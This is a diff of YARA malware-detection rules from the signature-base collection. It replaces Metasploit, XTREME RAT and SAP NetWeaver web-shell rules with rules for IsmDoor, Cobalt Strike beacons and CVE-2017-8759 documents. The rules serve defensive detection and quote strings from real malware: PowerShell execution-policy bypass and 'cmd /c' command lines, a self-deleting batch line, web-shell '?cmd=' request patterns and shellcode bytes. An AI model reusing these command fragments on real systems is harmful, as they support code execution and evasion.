-		hash1 = "3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082"
 
 	strings:
-		$s1 = { 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 }
-		$s2 = { 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b }
-		$s3 = { 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f }
+		$x1 = "Hello World!" fullword ascii
+		$x2 = "CONIN$" fullword ascii
+		$s6 = "GetCommandLineA" fullword ascii
+		$s7 = "ExitProcess" fullword ascii
+		$s8 = "CreateFileA" fullword ascii
+		$s5 = "SetConsoleMode" fullword ascii
+		$s9 = "TerminateProcess" fullword ascii
+		$s10 = "GetCurrentProcess" fullword ascii
+		$s11 = "UnhandledExceptionFilter" fullword ascii
+		$s3 = "user32.dll" fullword ascii
+		$s16 = "GetEnvironmentStrings" fullword ascii
+		$s2 = "GetLastActivePopup" fullword ascii
+		$s17 = "GetFileType" fullword ascii
+		$s19 = "HeapCreate" fullword ascii
+		$s20 = "VirtualFree" fullword ascii
+		$s21 = "WriteFile" fullword ascii
+		$s22 = "GetOEMCP" fullword ascii
+		$s23 = "VirtualAlloc" fullword ascii
+		$s24 = "GetProcAddress" fullword ascii
+		$s26 = "FlushFileBuffers" fullword ascii
+		$s27 = "SetStdHandle" fullword ascii
+		$s28 = "KERNEL32.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		$x1 and $x2 and ( all of ( $s* ) ) and filesize < 35000
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Svc : FILE
+rule SIGNATURE_BASE_Ismdoor_Jul17_A2 : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf-svc.exe"
+		description = "Detects IsmDoor Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "45d1c527-1f90-50f3-8e64-e77d69386b0a"
-		date = "2017-02-09"
+		id = "ea72a496-cbc8-56f6-a852-7af9761ea58e"
+		date = "2017-08-01"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L271-L285"
+		reference = "https://twitter.com/Voulnet/status/892104753295110145"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L54-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21c6aa2333335a5822328fb5176ca37060eb401640ed5cc340aefb63685078f4"
+		logic_hash = "7944f690be190927c905d3b3c6e26765504af9fcfb445cf70c8899af115d5001"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b02c9c10577ee0c7590d3dadc525c494122747a628a7bf714879b8e94ae5ea1"
+		hash1 = "be72c89efef5e59c4f815d2fce0da5a6fac8c90b86ee0e424868d4ae5e550a59"
+		hash2 = "ea1be14eb474c9f70e498c764aaafc8b34173c80cac9a8b89156e9390bd87ba8"
 
 	strings:
-		$s1 = "PAYLOAD:" fullword ascii
-		$s2 = ".exehll" ascii
+		$s1 = "powershell -exec bypass -file \"" fullword ascii
+		$s2 = "PAQlFcaWUaFkVICEx2CkNCUUpGcA" ascii
+		$s3 = "\\Documents" ascii
+		$s4 = "\\Libraries" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_11
+rule SIGNATURE_BASE_Unknown_Malware_Sample_Jul17_2 : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.hta"
+		description = "Detects unknown malware sample with pastebin RAW URL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59b0cced-ffdc-5f2f-878c-856883ee275f"
-		date = "2017-02-09"
+		id = "ce82b9eb-a9cb-5122-85dc-22794174c2f8"
+		date = "2017-08-01"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L287-L302"
+		reference = "https://goo.gl/iqH8CK"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L73-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f003989a99315b42c0c73beaa2928d0187fe92a4bf329912d64fac9f8fc9358c"
+		logic_hash = "966e14331fa89f2cdb5593a0c10227264085ee127deed28341e395ba6845e19d"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d1daf7bc41580322333a893133d103f7d67f5cd8a3e0f919471061d41cf710b6"
+		hash1 = "3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52"
 
 	strings:
-		$s1 = ".ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then" fullword ascii
-		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$s3 = "= CreateObject(\"Wscript.Shell\") " fullword ascii
+		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+		$s2 = "https://pastebin.com/raw/" wide
+		$s3 = "My.Computer" fullword ascii
+		$s4 = "MyTemplate" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Ref
+rule SIGNATURE_BASE_MAL_Unspecified_Jan18_1 : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf-ref.ps1"
+		description = "Detects unspecified malware sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "517ed365-03c6-5563-984b-dae10464671a"
-		date = "2017-02-09"
+		id = "f3187c60-8fff-54de-9918-2fb2301f2d92"
+		date = "2018-01-19"
 		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L304-L323"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L91-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed6e408575b88ff67479ac1b1a2f37c5fad3ec200a446700840ad4245386bfc4"
+		logic_hash = "cd4f7247473e04c348b49970ee3a6fd01415f005ac6dc7a79fbf937a693a80f4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87"
+		hash1 = "f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417"
 
 	strings:
-		$s1 = "kernel32.dll WaitForSingleObject)," ascii
-		$s2 = "= ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')" ascii
-		$s3 = "GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object" ascii
-		$s4 = ".DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual'," ascii
-		$s5 = "= [System.Convert]::FromBase64String(" ascii
-		$s6 = "[Parameter(Position = 0, Mandatory = $True)] [Type[]]" fullword ascii
-		$s7 = "DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard," ascii
+		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s2 = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1" fullword ascii
+		$s3 = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+		$s4 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b" fullword ascii
+		$s5 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+		$s6 = "%s\\%s.bat" fullword ascii
+		$s7 = "DEL /s \"%s\" >nul 2>&1" fullword ascii
 
 	condition:
-		5 of them
+		filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_MAL_Metasploit_Framework_UA : FILE
+rule SIGNATURE_BASE_APT_Cobaltstrike_Beacon_Indicator : FILE
 {
 	meta:
-		description = "Detects User Agent used in Metasploit Framework"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5a18456-3a07-5b58-ad95-086152298a1f"
-		date = "2018-08-16"
+		description = "Detects CobaltStrike beacons"
+		author = "JPCERT"
+		id = "8508c7a0-0131-59b1-b537-a6d1c6cb2b35"
+		date = "2018-11-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L325-L339"
+		reference = "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L40-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "986fea99735b93aed9dbf72582c009e11a1e7ba19b256902f93312474ef34b4a"
-		score = 65
-		quality = 85
+		logic_hash = "0f429a7a8c8bbea22eba3bbf81e391dab8e957583283a995d1d60d42f17c20e7"
+		score = 75
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29"
 
 	strings:
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)" fullword ascii
+		$v1 = { 73 70 72 6E 67 00 }
+		$v2 = { 69 69 69 69 69 69 69 69 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Meterpreter_Inmemory
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_Strings
 {
 	meta:
-		description = "Detects Meterpreter in-memory"
-		author = "netbiosX, Florian Roth"
-		id = "29c3bb7e-4da8-5924-ada7-2f28d9352009"
-		date = "2020-06-29"
-		modified = "2023-04-21"
-		reference = "https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L341-L363"
+		description = "Identifies strings used in Cobalt Strike Beacon DLL"
+		author = "Elastic"
+		id = "af558aa2-a3dc-5a7a-bc74-42bb2246091c"
+		date = "2021-03-16"
+		modified = "2023-12-05"
+		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L54-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4b39dbcb276842a1306205cf2e51ce86b6d2aa21353d277df15f4ea3b3d97678"
-		score = 85
+		logic_hash = "4349a7ad94df2269217b55c2aef9628c4eef078566c276936accdd4f996ba2cf"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$sxc1 = { 6D 65 74 73 72 76 2E 64 6C 6C 00 00 52 65 66 6C
-               65 63 74 69 76 65 4C 6F 61 64 65 72 }
-		$sxs1 = "metsrv.x64.dll" ascii fullword
-		$ss1 = "WS2_32.dll" ascii fullword
-		$ss2 = "ReflectiveLoader" ascii fullword
-		$fp1 = "SentinelOne" ascii wide
-		$fp2 = "fortiESNAC" ascii wide
-		$fp3 = "PSNMVHookMS" ascii wide
+		$s1 = "%02d/%02d/%02d %02d:%02d:%02d"
+		$s2 = "Started service %s on %s"
+		$s3 = "%s as %s\\%s: %d"
 
 	condition:
-		(1 of ( $sx* ) or 2 of ( $s* ) ) and not 1 of ( $fp* )
+		2 of them
 }
-
-rule SIGNATURE_BASE_Xtreme_Sep17_1 : FILE
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_XOR_Strings
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7517e237-9cad-5619-9028-4c7ab5463040"
-		date = "2017-09-27"
+		description = "Identifies XOR'd strings used in Cobalt Strike Beacon DLL"
+		author = "Elastic"
+		id = "359160a8-cf1c-58a8-bf7f-c09a8d661308"
+		date = "2021-03-16"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L14-L37"
+		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L69-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa78b43f729032291c27f67dc53bd39a85c9a50323c7adf909ca2a8c5acdd861"
+		logic_hash = "b5009c29055784ce6371100417b862f723d7e3c1b4081c563fcd8770db48051f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6"
+		tags = ""
+		xor_s1 = "%02d/%02d/%02d %02d:%02d:%02d"
+		xor_s2 = "Started service %s on %s"
+		xor_s3 = "%s as %s\\%s: %d"
 
 	strings:
-		$x1 = "ServerKeyloggerU" fullword ascii
-		$x2 = "TServerKeylogger" fullword ascii
-		$x3 = "XtremeKeylogger" fullword wide
-		$x4 = "XTREMEBINDER" fullword wide
-		$s1 = "shellexecute=" fullword wide
-		$s2 = "[Execute]" fullword wide
-		$s3 = ";open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\" wide
+		$s1 = "%02d/%02d/%02d %02d:%02d:%02d" xor(0x01-0xff)
+		$s2 = "Started service %s on %s" xor(0x01-0xff)
+		$s3 = "%s as %s\\%s: %d" xor(0x01-0xff)
+		$fp1 = "MalwareRemovalTool"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "735af2a144f62c50ba8e89c1c59764eb" or ( 1 of ( $x* ) or 3 of them ) )
+		2 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Xtreme_Sep17_2 : FILE
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_4_2_Decrypt
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b4878e80-54dc-5a16-9129-ddf2b1a5d287"
-		date = "2017-09-27"
+		description = "Identifies deobfuscation routine used in Cobalt Strike Beacon DLL version 4.2"
+		author = "Elastic"
+		id = "63b71eef-0af5-5765-b957-ccdc9dde053b"
+		date = "2021-03-16"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L39-L53"
+		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L90-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb86167e0267d52b1b7503abd8f5b988296e3cde12453ace529c4e043d2ca69e"
+		logic_hash = "8685b1626c8d263f49ccf129dcd4fe1b42482fcdb37c2e109cedcecaed8c2407"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f8413827c52a5b073bdff657d6a277fdbfda29d909b4247982f6973424fa2dcc"
+		tags = ""
 
 	strings:
-		$s1 = "Spy24.exe" fullword wide
-		$s2 = "Remote Service Application" fullword wide
+		$a_x64 = {4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03}
+		$a_x86 = {8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them )
+		any of them
 }
-rule SIGNATURE_BASE_Xtreme_Sep17_3 : FILE
+rule SIGNATURE_BASE_HKTL_Win_Cobaltstrike : COMMODITY
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "160673ea-b263-520a-a1c1-da0f3e920f12"
-		date = "2017-09-27"
+		description = "The CobaltStrike malware family."
+		author = "threatintel@volexity.com"
+		id = "113ba304-261f-5c59-bc56-57515c239b6d"
+		date = "2021-05-25"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L55-L69"
+		reference = "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L104-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c110863028ab1f557270e52de608179ce582a47e0a20994f83d385ed285bda9a"
+		hash = "b041efb8ba2a88a3d172f480efa098d72eef13e42af6aa5fb838e6ccab500a7c"
+		logic_hash = "1e8a68050ff25f77e903af2e0a85579be1af77c64684e42e8f357eee4ae59377"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f540a4cac716438da0c1c7b31661abf35136ea69b963e8f16846b96f8fd63dde"
+		tags = "COMMODITY"
 
 	strings:
-		$s2 = "Keylogg" fullword ascii
-		$s4 = "XTREME" fullword wide
+		$s1 = "%s (admin)" fullword
+		$s2 = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A 0D 0A 00}
+		$s3 = "%02d/%02d/%02d %02d:%02d:%02d" fullword
+		$s4 = "%s as %s\\%s: %d" fullword
+		$s5 = "%s&%s=%s" fullword
+		$s6 = "rijndael" fullword
+		$s7 = "(null)"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Xtreme_RAT_Gen_Imp : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_Mal_HTA : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
+		description = "Detects malicious files related to CVE-2017-8759 - file cmd.hta"
 		author = "Florian Roth (Nextron Systems)"
-		id = "10b23099-2a87-5918-927b-f20bcba1cd70"
-		date = "2017-09-27"
+		id = "e53b5149-fc94-5da5-8e35-7f09a9cd79fd"
+		date = "2017-09-14"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xtreme_rat.yar#L71-L86"
+		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9cfd6473e7f8d1f899fe2cdbb49a4086ea7ac6151602d0964ed28b16d2d0188d"
+		logic_hash = "f98578104e411fcf75a46f8a0bc3e561c94d0ca4ad7c1aae2595d03a29efd74e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2017-8759, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b5082bcc8487bb65c38e34c192c2a891e7bb86ba97281352b0837debee6f1cf"
+		hash1 = "fee2ab286eb542c08fdfef29fabf7796a0a91083a0ee29ebae219168528294b5"
+
+	strings:
+		$x1 = "Error = Process.Create(\"powershell -nop cmd.exe /c" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "d0bdf112886f3d846cc7780967d8efb9" or pe.imphash ( ) == "cc6f630f214cf890e63e899d8ebabba6" or pe.imphash ( ) == "e0f7991d50ceee521d7190effa3c494e" )
+		( uint16( 0 ) == 0x683c and filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_1 : SCRIPT CVE_2025_31324 FILE
+rule SIGNATURE_BASE_CVE_2017_8759_Mal_Doc : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
-		author = "Florian Roth"
-		id = "78863492-5c83-55a8-900b-057e99125414"
-		date = "2025-04-25"
-		modified = "2025-05-15"
-		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sap_netweaver_apr25.yar#L2-L14"
+		description = "Detects malicious files related to CVE-2017-8759 - file Doc1.doc"
+		author = "Florian Roth (Nextron Systems)"
+		id = "48587c13-7661-5987-8331-732115f7823b"
+		date = "2017-09-14"
+		modified = "2023-11-21"
+		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L26-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab6c5e17bba15a3f968bdbe88a8cf4a039c55b6035d91fd3c6b30092be89af5c"
-		score = 70
+		logic_hash = "0c81feebef463fee41661ca951a39ee789db5d36acc8262ddb391609d8680108"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2025-31324, FILE"
+		tags = "CVE-2017-8759, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6314c5696af4c4b24c3a92b0e92a064aaf04fd56673e830f4d339b8805cc9635"
 
 	strings:
-		$x01 = "/helper.jsp?cmd=" ascii wide
-		$x02 = "/cache.jsp?cmd=" ascii wide
+		$s1 = "soap:wsdl=http://" ascii wide
+		$s2 = "soap:wsdl=https://" ascii wide
+		$s3 = "soap:wsdl=http%3" ascii wide
+		$s4 = "soap:wsdl=https%3" ascii wide
+		$c1 = "Project.ThisDocument.AutoOpen" fullword wide
 
 	condition:
-		filesize < 20MB and 1 of them
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and ( 1 of ( $s* ) and $c1 )
 }
-rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_2 : SCRIPT CVE_2025_31324 FILE
+rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Via_JS : FILE
 {
 	meta:
-		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
-		author = "Florian Roth"
-		id = "17fb236e-e78c-51e5-b0a8-14964e38dfc5"
-		date = "2025-04-25"
-		modified = "2025-05-15"
-		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sap_netweaver_apr25.yar#L16-L27"
+		description = "Detects SOAP WDSL Download via JavaScript"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9e96cea3-4282-5f25-ad37-51bd69258790"
+		date = "2017-09-14"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/buffaloverflow/status/907728364278087680"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L47-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dfc24a4f359e2bc899ab3924bd342c2c6bd8c757b7c1d3859a47f61b9e4039a9"
-		score = 70
-		quality = 85
-		tags = "SCRIPT, CVE-2025-31324, FILE"
+		logic_hash = "3c170479283fe859b9ecfba4834396aaf78b375472250a4b188bc913f69c97fd"
+		score = 60
+		quality = 81
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x03 = "MSBuild.exe c:\\programdata\\" ascii wide
+		$s1 = "GetObject(\"soap:wsdl=https://" ascii wide nocase
+		$s2 = "GetObject(\"soap:wsdl=http://" ascii wide nocase
 
 	condition:
-		filesize < 20MB and 1 of them
+		( filesize < 3KB and 1 of them )
 }
-rule SIGNATURE_BASE_SUSP_WEBSHELL_Cmd_Indicator_Apr25
+rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Excel : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects a pattern which is often related to web shell activity"
-		author = "Florian Roth"
-		id = "735359b2-9f94-5618-8ec5-7ab8f5e5e16d"
-		date = "2025-04-25"
-		modified = "2025-05-07"
-		reference = "https://regex101.com/r/N6oZ2h/2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sap_netweaver_apr25.yar#L29-L41"
+		description = "Detects malicious files related to CVE-2017-8759"
+		author = "Florian Roth (Nextron Systems)"
+		id = "940ec910-49a4-5271-97e4-8536db271b80"
+		date = "2017-09-15"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/buffaloverflow/status/908455053345869825"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L63-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b992786a58389749db40fc90363f00c5df374d514374afc2d6fdff4429cb1ec0"
+		logic_hash = "adea595b251796e93cdc54cc59198d88a68e28d42899c90721f63f6813df24fe"
 		score = 60
-		quality = 60
-		tags = ""
+		quality = 83
+		tags = "CVE-2017-8759, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr01 = /\.(asp|aspx|jsp|php)\?cmd=[a-z0-9%+\-\/\.]{3,20} HTTP\/1\.[01]["']? 200/
+		$s1 = "|'soap:wsdl=" ascii wide nocase
 
 	condition:
-		1 of them
+		( filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Txt : CVE_2017_8759 FILE
 {
 	meta:
-		description = "php webshell having some kind of input and some kind of payload. restricted to small files or big ones including suspicious strings"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "294ce5d5-55b2-5c79-b0f8-b66f949efbb2"
-		date = "2021-01-14"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L83-L411"
+		description = "Detects malicious file in releation with CVE-2017-8759 - file exploit.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "36474420-4fa9-5264-a46b-bb2434624710"
+		date = "2017-09-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L78-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
